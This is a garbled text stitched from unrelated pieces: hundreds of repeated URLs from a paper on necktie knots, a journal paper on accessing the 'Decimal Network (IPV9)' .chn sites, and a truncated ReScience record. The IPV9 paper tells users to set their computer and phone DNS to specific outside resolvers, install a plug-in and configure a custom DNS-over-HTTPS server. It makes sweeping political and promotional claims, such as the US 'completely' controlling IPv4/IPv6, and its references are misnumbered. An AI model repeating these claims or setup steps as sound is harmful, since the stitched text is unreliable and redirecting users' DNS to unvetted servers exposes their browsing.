http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.7717/peerj-cs.2#supplemental-information http://dx.doi.org/10.1038/17938 http://dx.doi.org/10.1016/S0378-4371(99)00226-5 http://arxiv.org/abs/1204.4982 http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://xirdalium.net/2010/06/20/eldredge-reloaded/ http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com/blog/musings/545-how-to-tie-a-necktie-eldredge-knot http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://agreeordie.com/blog/musings/553-how-to-tie-a-necktie-trinity-knott http://dx.doi.org/10.7717/peerj-cs.2 Stanley RP. 1997. Enumerative combinatorics, Cambridge studies in advanced mathematics 49, vol. 1. Cambridge: Cambridge University Press. Stanley RP. 1999. Enumerative combinatorics, Cambridge studies in advanced mathematics 62, vol. 2. Cambridge: Cambridge University Press. Vejdemo-Johansson M. 2015. Random tie knots webpage. Available at http://dx.doi.org/10.6084/m9. figshare.1300138 (accessed February 2015). Wachowski A, Wachowski L, Silver J, Reeves K, Fishburne L, Moss C, Weaving H, Smith J, Foster G, Perrineau H et al. 2003. The Matrix Reloaded [Film]. USA: Warner Bros. Pictures. Hirsch et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.2 15/15 https://peerj.com/computer-science/ http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.6084/m9.figshare.1300138 http://dx.doi.org/10.7717/peerj-cs.2 More ties than we thought Introduction Formal languages The Anatomy of a Necktie A Language for Tie-knots Language Complexity Single-depth tucks Recursive tucks Classification of the tie-knot language Enumeration Generating functions Tables of counts Aesthetics Conclusion Acknowledgements References work_2mp36ujpvjcgdc3qzaxexknpvi ---- International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 DOI: 10.21307/ijanmc-2020-026 36 A Method to Access a Decimal Network (IPV9) Resource Guangzhou Liu, Fuya Yu Xi'an Decimal Network Technology Co. LTD Xi'an V9 Network Research Institute Co. LTD Email: 5571200@qq.com Abstract—Network security is highly valued by world leaders. The current Internet technology core is IPv4, IPv6, completely controlled by the United States. On December 14, 2017, the US Federal Communications Commission (FCC) formally abolished the net neutrality law. At that time, the Internet took on an obvious political color and posed a serious threat to Internet applications in various countries. China's economy is already highly dependent on the Internet, and if the network is disrupted, the whole country will suffer heavy losses. The decimal Network Standard working Group of The Ministry of Industry and Information Technology of China and The Decimal Network Information Technology Co., LTD of Shanghai have been researching on the future network for more than 20 years. Developed a complete set of decimal network framework system, completed the future network series research and development with China's independent intellectual property rights, and built the second Internet network system besides the United States. The technology has been fully tested in many places and achieved good results, truly achieving the goal of "autonomy, safety, high speed and compatibility". This paper will introduce the method of accessing decimal network resources in the current network environment. Keywords-Decimal Network; CHN; Domain Name; Network Resources Decimal network is a complete independent intellectual property rights based overall decimal digital code, the establishment of 2 256 times of cyberspace sovereignty. It includes 13 root domain name servers from the parent root, the primary root, and the zero-trust security mechanism for communication after verification. Compatible with current Internet systems, it has a future Internet architecture that overlaps geographical location and IP address space. Most Internet applications today are based on IPv4 environments. In the context of the existing Internet network, the IPV9 .chn domain name network can be accessed by setting up the existing computer or terminal. Most current computer browsers and mobile browsers support access. For example, Firefox, Google Chrome, Microsoft Edge, 360 speed browser and so on are common on computers. Safari and Baidu browser commonly used on mobile phones need to set the network DNS and point to the IPV9 DNS server before using the browser to open the website. The addresses are: 202.170.218.93 and 61.244.5.162. Once set up, you can access the resources of the decimal network in the current Internet environment. Before visiting, a few typical IPV9 sites are recommended, as shown in Table 1. Here are the steps to accessing the .C web site on your PC and mobile phone. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 37 TABLE I. TYPICAL CHN DOMAIN NAME WEBSITES Website domain name Web resources Resource management Resources to address http://www.v9.chn .chn portal website Decimal Network Standard Working Group Shanghai http://em777.chn Decimal technology introduction website Shanghai Decimal Network Information Technology Co. LTD Shanghai http://www.xav9.chn Xi 'an Decimal System portal Xi 'an Decimal Network Technology Co. LTD Xi 'an http://www.xa.chn V9 Research Institute portal Xi 'an Weijiu Research Institute Co. LTD Xi 'an http://www.hqq.chn/ The red Flag Canal craftsman Xi 'an Decimal Network Technology Co. LTD Xi 'an http://www.zjsjz.chn Zhejiang Decimal System portal website Zhejiang Decimal Network Co. LTD Hangzhou http://www.zjbdth.chn Beidou day draw Beidou Tianhua Information Technology Co. LTD Hangzhou I. COMPUTER ACCESS. CHN WEBSITE SETTINGS Introduce with Windows10 system settings (PC). 1) First click the "Network" icon on the desktop and select the "Properties" option. The interface appears as shown in Figure 1. Figure 1. Network and share Center setup interface International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 38 2) Click the "Connection: Ethernet" option in the network and Sharing Center setting interface. The interface appears as shown in Figure 2. Figure 2. Ethernet status interface 3) In the Ethernet status interface, click the "Properties" button. The dialog box appears as shown in Figure 3. Figure 3. Ethernet property interface 4) In the Ethernet property interface, double-click the option "Internet Protocol Version 4 (TCP/IPv4)". The dialog box appears as shown in Figure 4. Setting the preferred DNS and alternate DNS and finished setup. Figure 4. Internet Protocol version 4 (TCP/IPv4) properties 5) Open a browser. Firefox or Google Chrome is recommended. Enter http://www.hqq.chn in the browser address bar to access the IPV9 site, as shown in Figure 5. II. MOBILE ACCESS .CHN WEBSITE At present, there are many types of mobile phones, but the setting method is similar. Android mobile phone can download the plug-in (download address: https://www.dtgty.com/HomeSearch) by flow direct access. But in most cases, access to .chn resources will be more convenient over local Wi-Fi. It can also be accessed through mobile hotspots, with the same Settings as Wi-Fi and mobile hotspots. Take Huawei (Android system) mobile phone and iPhone (iOS system) mobile phone as an example to introduce the setting method of mobile DNS. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 39 A. Huawei Mobile Phone setting The phone type is HUAWEI Mate 20, Android 10 and EMUI 10.1.0. 1) Click "Settings" on the desktop of the mobile phone to display the setting interface, as shown in Figure 6. Figure 5. Access the IPV9 site Figure 6. Mobile phone Setting Interface Figure 7. Wireless connection setting interface International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 40 2) Click "Wireless LAN" in the interface, and the interface appears as shown in Figure 7. 3) Press on the connected network name for a while, and additional menu options appear, as shown in Figure 8. Click "Modify Network" menu, the interface of network parameter setting appears, and select "Display Advanced Options", as shown in Figure 9. Select the "Static" option, as shown in Figure 10. Figure 8. Modification of network Interface Figure 9. Parameter setting interface 4) Modify DNS according to the parameters in the figure. After modification, click "Save" button to complete the setting. Figure 10. Modification of network Interface Figure 11. Parameter setting interface 5) Return to the main interface of the mobile phone and enter http://www.xand.chn in the browser International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 41 (Firefox or Google Chrome) to browse the overseas study service website for testing, as shown in Figure 11. The rest are Xiaomi phones, Vivo phones and so on. You can access IPV9 network resources by simply setting the DNS Settings for the connection network. B. iPhone parameter setting Mobile phone model: iPhone XR, system: IOS13.5. 1) Click "Settings" on the desktop of the mobile phone to appear the setting interface. Click "Wireless LAN" in the interface. The interface appears as shown in Figure 12. 2) Click the icon on the right of the connected WLAN, and the network setting interface appears, as shown in Figure 13. Figure 12. Interface of wireless LAN Figure Figure 13. Interface of wireless connection parameters Figure 14. DNS Setting Interface 3) In the setting interface, select "Configure DNS" and the DNS setting interface appears, as shown in Figure 14. Select the Add Server option and enter the DNS address shown in the figure. Click the "Save" command in the upper right corner of the interface to complete the setup. 4) Open the browser. Enter http://www.xav9.chn in the address bar to open the main interface of Xi 'an Future Network, as shown in Figure 15. III. METHOD OF ACCESSING IPV9 WEBSITE WITH CHINESE DOMAIN NAME In addition to accessing network resources through character domain names, the decimal network system can also use Chinese domain names to access, in the format: http:// Chinese.*****, but before access to the following Settings. Take the Firefox browser, for example. 1) Open the Firefox browser and click the menu button in the upper right corner to open the browser Settings menu, as shown in Figure 16. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 42 Figure 15. Xi 'an Future Network main interface Figure 16. Firefox menu Settings screen International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 43 2) Click the "Options" command, drag the right scroll bar to the bottom of the page, and network Settings appear, as shown in Figure 17. Figure 17. Firefox menu options screen 3) Click the "Settings" button in network Settings, and the "Connection Settings" dialog box appears, as shown in Figure 18. In the Configure Proxy Server to Access the Internet option, select Do not Use proxy Server (Y), and then select Enable HTTPS DNS at the bottom of the screen. Finally enter https://doh.zsw9.cn/dns.query in the "custom" edit box. 4) After setting, click "OK" button to complete setting. Enter the Chinese domain name "China Micro Nine Research Institute" into the Firefox browser to access Chinese website resources. This is shown in Figure 19. To facilitate test access, several typical IPV9 sites are recommended, as shown in Table 2. International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 44 Figure 18. Firefox connection Settings screen Figure 19. Website of Xi 'an V9 Research Institute International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 45 TABLE II. TYPICAL CHINESE DOMAIN NAME WEBSITES Character of the domain name Web resources Chinese domain name Resource management http://www.ijanmc.chn New online international journals http:// in China. New network and detection control Xi’an Technological University http://www.iccnea.chn ICCNEA International Conference Website http:// in China. The international conference on Xi’an Technological University http://www.xa.chn .chn portal website http:// in China. Micro Nine Research Institute Xi 'an Decimal Network Company http://www.xav9.chn Xi 'an Decimal System portal http:// in China. Xi 'an Future Network Portal Xi 'an Decimal Network Company http://www.xand.chn Xi 'an NORTON Study Abroad website http:// in China. Xi 'an NORTON Study Abroad Xi 'an Decimal Network Company http://www.hqq.chn The red Flag Canal craftsman http:// in China. The red Flag Canal craftsman Xi 'an Decimal Network Company http://www.xazn.chn The website of Zhengnuo Conference Company The website of Zhengnuo Conference Company Xi 'an Decimal Network Company In addition to accessing network resources through character domain names and Chinese characters, the decimal address can also be used to access resources. A website corresponds to a decimal address. At the same time, we can also realize a decimal address corresponding to multiple network resources in the way of subdirectory structure. Since decimal address access is bound to the computer in the background, setup is cumbersome, and only a presentation interface is provided here, as shown in Figure 20. Figure 20. Red Flag Canal Craftsman website International Journal of Advanced Network, Monitoring and Controls Volume 05, No.03, 2020 46 At present the decimal network is in the experimental application stage, although the network resources are less, but the original resources running on the Internet can be completely translated to the decimal network system. With the introduction of national policy, the decimal network of resources will be more and more. The decimal network application of China's independent intellectual property rights is bound to enter thousands of households. IV. CONCLUSION This paper introduces the method of using browser to access decimal network resources through personal computer terminal or personal mobile phone under the current Internet environment. A simple DNS setup is required to point to the decimal server to complete resource access. The setup is very simple, which lays the foundation for a wide range of network applications. REFERENCE [1] Xie Jianping. A method for assigning addresses to networked computers using full decimal algorithm, Chinese patent No. : ZL00135182.6, 2004.2.6. [2] Xie Jianping. A method for assigning addresses to networked computers using a full decimal algorithm, U.S. Patent No. :US: 8082365, [4] RFC - Internet Standard. Internet Protocol, DARPA INTERNET PROGRAM PROTOCOL SPECIFICATION, RFC 791, 1981.09. [3] S. Deering, R. Hinden, Network Working Group. Internet Protocol, Version 6 (IPv6)-Specification, RFC-1883, 1995.12. [4] M. Crawford. Network Working Group. Transmission of IPv6 Packets over Ethernet Networks. RFC-2464, 1998.12. [5] J. Onions, Network Working Group. A Historical Perspective on the usage of IP version 9. RFC1606. 1994.04. [6] V. Cerf, Network Working Group. A VIEW FROM THE 21ST CENTURY, RFC1607. 1994.04. work_2p32le2xefgk7mdiaxsaftmnmu ---- Aalborg Universitet Sustainable computational science the ReScience initiative Rougier, Nicolas; Hinsen, Konrad; Alexandre, Frédéric; Arildsen, Thomas; Barba, Lorena; Benureau, Fabien; Brown, C. Titus; de Buyl, Pierre; Caglayan, Ozan; Davison, Andrew; Delsuc, Marc André; Detorakis, Georgios; Diem, Alexandra; Drix, Damien; Enel, Pierre; Girard, Benoît; Guest, Olivia; Hall, Matt; Henriques, Rafael; Hinaut, Xavier; Jaron, Kamil; Khamassi, Mehdi; Klein, Almar; Manninen, Tiina; Marchesi, Pietro; McGlinn, Dan; Metzner, Christoph; Petchey, Owen; Ekkehard Plesser, Hans; Poisot, Timothée; Ram, Karthik; Ram, Yoav; Roesch, Etienne; Rossant, Cyrille; Rostami, Vahid; Shifman, Aaron; Stachelek, Joseph; Stimberg, Marcel; Stollmeyer, Frank; Vaggi, Federico; Viejo, Guillaume; Vitay, Julien; Vostinar, Anya; Yurchak, Roman; Zito, Tiziano Published in: PeerJ DOI (link to publication from Publisher): 10.7717/peerj-cs.142 Creative Commons License CC BY 4.0 Publication date: 2017 Document Version Publisher's PDF, also known as Version of 